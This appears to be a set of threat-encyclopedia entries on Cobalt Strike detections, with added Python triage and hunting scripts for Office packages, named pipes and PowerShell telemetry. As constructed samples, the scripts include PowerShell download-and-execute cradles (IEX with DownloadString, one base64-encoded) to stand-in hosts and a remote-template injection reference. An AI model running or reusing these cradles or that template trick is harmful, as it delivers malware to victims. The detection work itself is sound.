Trojan:XML/CobaltStrike
This detection covers XML content inside a VBA-enabled Office file (Word, Excel, and PowerPoint documents are the usual carriers). The XML content is what retrieves the Cobalt Strike loader from the attacker-controlled URL.
Cobalt Strike is a commercially available penetration-testing tool used for adversary simulation. It is also widely abused by threat actors and turns up in many intrusions that precede ransomware deployment.
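One way to triage a document for the traits this description names, as an added example that is not Microsoft's detection logic: unpack the Office Open XML package, note whether a VBA project is present, and look for XML content that points outside the file. How the XML "downloads" is an assumption of the example: it is modelled as a relationship with TargetMode="External" in a .rels part (the mechanism behind remote-template injection) and, more loosely, as any non-schema http(s) URL inside an XML part. The sample document is constructed in memory; the host loader.example.invalid is made up.

```python
"""Triage an Office Open XML (docx/xlsx/pptx) package for a VBA project plus
XML content that reaches out to an external URL. Added example, not Microsoft's
detection logic; the sample document below is constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # for untrusted documents prefer defusedxml

URL_RE = re.compile(rb"https?://[^\s\"'<>]+", re.IGNORECASE)
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Namespace/schema URLs every Office file contains; not indicators on their own.
KNOWN_SCHEMA_PREFIXES = (
    b"http://schemas.openxmlformats.org/",
    b"http://schemas.microsoft.com/",
    b"http://www.w3.org/",
    b"http://purl.org/",
)


def triage_ooxml(data: bytes) -> dict:
    """Return a findings dict for an OOXML package given as bytes."""
    findings = {"vba_project": False, "external_rels": [], "urls_in_xml": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lname = name.lower()
            if lname.endswith("vbaproject.bin"):
                # Any vbaProject.bin means macro code ships with the document.
                findings["vba_project"] = True
                continue
            body = zf.read(name)
            if lname.endswith(".rels"):
                # Relationships with TargetMode="External" resolve outside the
                # package: Office fetches the target when the part is loaded.
                for rel in ET.fromstring(body).iter(RELS_NS + "Relationship"):
                    if rel.get("TargetMode") == "External":
                        findings["external_rels"].append((name, rel.get("Target")))
            elif lname.endswith(".xml"):
                for url in URL_RE.findall(body):
                    if not url.startswith(KNOWN_SCHEMA_PREFIXES):
                        findings["urls_in_xml"].append((name, url.decode("ascii", "replace")))
    # Macros alone are common in legitimate documents; macros plus an external
    # fetch is the combination worth escalating.
    findings["suspicious"] = findings["vba_project"] and bool(
        findings["external_rels"] or findings["urls_in_xml"]
    )
    return findings


def build_sample_docx() -> bytes:
    """Constructed sample: macro-enabled Word package with an external attached template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        # OLE compound-file magic followed by a stub body; real macro code is not needed here.
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)
        zf.writestr("word/_rels/settings.xml.rels",
                    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                    '<Relationship Id="rId1" TargetMode="External" '
                    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
                    'Target="http://loader.example.invalid/template.dotm"/>'
                    '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_ooxml(build_sample_docx()).items():
        print(f"{key}: {value}")
```

The schema allowlist matters: every Office document carries dozens of schemas.openxmlformats.org URLs in its XML, so a naive URL grep flags everything. Conversely, a macro-enabled file with no external reference is not flagged here; the VBA itself would need a separate pass (for example with oletools' olevba).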
For information about Cobalt Strike and other human-operated malware campaigns, read these blog posts:
HackTool:Win64/CobaltStrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
HackTool:Win32/CobaltStrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
Backdoor:Win64/CobaltStrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
Backdoor:Win32/CobaltStrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
Behavior:Win32/CobaltStrike
Behavior:Win32/CobaltStrike is a behavior-based detection: rather than matching a file, it flags the generic runtime behaviors exhibited by Cobalt Strike Beacon.
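One runtime behavior a defender can hunt for independently of any file signature is Beacon's named-pipe usage. The following is an added example, not Microsoft's detection logic: it matches pipe telemetry against Beacon's widely documented out-of-the-box pipe names (msagent_##, MSSE-####-server, postex_####, status_##). An operator can rename these in the malleable profile, so a hit is a lead to triage rather than proof, and a miss proves nothing. The events are constructed in the shape of Sysmon pipe events (EventID 17 created, 18 connected), reduced to the fields the hunt uses; the image paths are illustrative.

```python
"""Hunt named-pipe telemetry for Cobalt Strike Beacon's default pipe names.
Added example, not Microsoft's detection logic; events below are constructed."""
import re

# Beacon defaults, matched against the bare pipe name (no \\.\pipe\ prefix).
DEFAULT_PIPE_PATTERNS = {
    "smb_beacon_msagent": re.compile(r"^msagent_[0-9a-f]{2}$", re.I),
    "artifact_kit_msse": re.compile(r"^MSSE-\d{1,4}-server$", re.I),
    "postex_job": re.compile(r"^postex_[0-9a-f]{4}$", re.I),
    "smb_beacon_status": re.compile(r"^status_[0-9a-f]{2}$", re.I),
}

# Sysmon records the name as "\foo"; other sources give the full "\\.\pipe\foo".
PIPE_PREFIX_RE = re.compile(r"^\\\\\.\\pipe\\", re.I)


def normalize_pipe_name(name: str) -> str:
    """Reduce '\\\\.\\pipe\\foo', '\\foo' and 'foo' to 'foo'."""
    return PIPE_PREFIX_RE.sub("", name).lstrip("\\")


def match_default_pipe(name: str):
    """Return the label of the matching default pattern, or None."""
    bare = normalize_pipe_name(name)
    for label, rx in DEFAULT_PIPE_PATTERNS.items():
        if rx.match(bare):
            return label
    return None


def hunt(events):
    """Return (EventID, Image, bare pipe name, label) for each matching event."""
    hits = []
    for ev in events:
        label = match_default_pipe(ev["PipeName"])
        if label:
            hits.append((ev["EventID"], ev["Image"], normalize_pipe_name(ev["PipeName"]), label))
    return hits


# Constructed events: the first three mimic stock Beacon, the last two are ordinary.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\msagent_2f"},
    {"EventID": 18, "Image": r"C:\Windows\explorer.exe", "PipeName": r"\\.\pipe\MSSE-1317-server"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\postex_a1b2"},
    {"EventID": 17, "Image": r"C:\Program Files\Git\usr\bin\ssh.exe", "PipeName": r"\ssh-agent"},
    {"EventID": 18, "Image": r"C:\Windows\System32\lsass.exe", "PipeName": r"\lsass"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Pair the pipe name with the creating image: a pipe called msagent_2f opened by rundll32.exe or a spoofed svchost.exe is a much stronger lead than the name alone, and that pairing is what the returned tuples are for.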
Trojan:Win32/Cobaltstrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
Trojan:Win64/Cobaltstrike
This detection covers Cobalt Strike Beacon, the post-exploitation payload that is deployed on a compromised device and gives the attacker remote access to it: running commands, transferring files, and staging further payloads, among other tasks.
TrojanDownloader:Win32/CobaltStrike
TrojanDownloader:Win32/CobaltStrike is a trojan downloader: it retrieves and installs other programs, including additional malware, without the user's consent. In this case the payload it downloads and installs is the Cobalt Strike Beacon.
TrojanDownloader:PowerShell/CobaltStrike
This detection covers the PowerShell script that downloads the Cobalt Strike loader from a .onion site or another attacker-controlled URL.
Cobalt Strike is a commercially available penetration-testing tool used for adversary simulation. It is also widely abused by threat actors and turns up in many intrusions that precede ransomware deployment.
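The same traits can be checked in telemetry. The following is an added example, not Microsoft's detection logic: it triages PowerShell command lines or script blocks (the text an analyst sees in Event ID 4104 script-block logs or 4688 process-creation events) for the download-cradle shape, and decodes -EncodedCommand arguments first, since that switch carries base64 over UTF-16LE and hides the cradle from plain string matching. The sample lines are constructed; the hosts cdn.example.invalid and the test...test.onion name are made up.

```python
"""Triage PowerShell command lines / script blocks for download cradles.
Added example, not Microsoft's detection logic; sample lines are constructed."""
import base64
import binascii
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
CRADLE_PATTERNS = {
    # System.Net.WebClient download methods, the classic cradle
    "webclient_download": re.compile(r"Net\.WebClient.*?\.Download(?:String|File|Data)\s*\(", re.I | re.S),
    # cmdlets and aliases that fetch over HTTP
    "http_fetch": re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b", re.I),
    # executing whatever was fetched
    "invoke_expression": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    # Tor hidden-service hostnames (v2: 16 chars, v3: 56 chars, base32 alphabet)
    "onion_url": re.compile(r"https?://[a-z2-7]{16,56}\.onion\b", re.I),
}


def decode_encoded_commands(line: str) -> str:
    """Return the decoded text of every -EncodedCommand argument on the line."""
    decoded = []
    for b64 in ENC_RE.findall(line):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-16le", "replace"))
        except (binascii.Error, ValueError):
            pass  # not valid base64; the plaintext matcher still sees the line
    return "\n".join(decoded)


def verdict(tags: set) -> str:
    downloads = tags & {"webclient_download", "http_fetch"}
    if "onion_url" in tags:
        return "suspicious"
    if downloads and "invoke_expression" in tags:
        return "suspicious"  # fetch plus execute on one line is the cradle shape
    if downloads:
        return "review"      # downloads, but nothing shows the result is executed
    return "benign"


def analyze_line(line: str) -> dict:
    decoded = decode_encoded_commands(line)
    text = line + ("\n" + decoded if decoded else "")
    tags = {name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)}
    return {
        "line": line,
        "encoded": bool(decoded),
        "decoded": decoded,
        "tags": tags,
        "urls": URL_RE.findall(text),
        "verdict": verdict(tags),
    }


def triage(lines):
    """Analyze every line, preserving input order."""
    return [analyze_line(line) for line in lines]


def encode_powershell(cmd: str) -> str:
    """Produce what -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed samples: plaintext cradle, encoded cradle to an .onion host,
# benign script execution, and a plain download with no execution.
SAMPLE_LINES = [
    'powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString(\'http://cdn.example.invalid/update.ps1\'))"',
    "powershell.exe -nop -w hidden -enc " + encode_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://" + "test" * 14 + ".onion/loader')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    "Invoke-WebRequest -Uri https://www.example.com/report.json -OutFile report.json",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        print(r["verdict"], sorted(r["tags"]), r["urls"])
```

The verdict deliberately separates "downloads something" from "downloads and executes it": Invoke-WebRequest to an ordinary host is everyday administration, while fetch plus IEX, or any .onion destination, is the combination this detection family is about.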
Read the following blogs for details: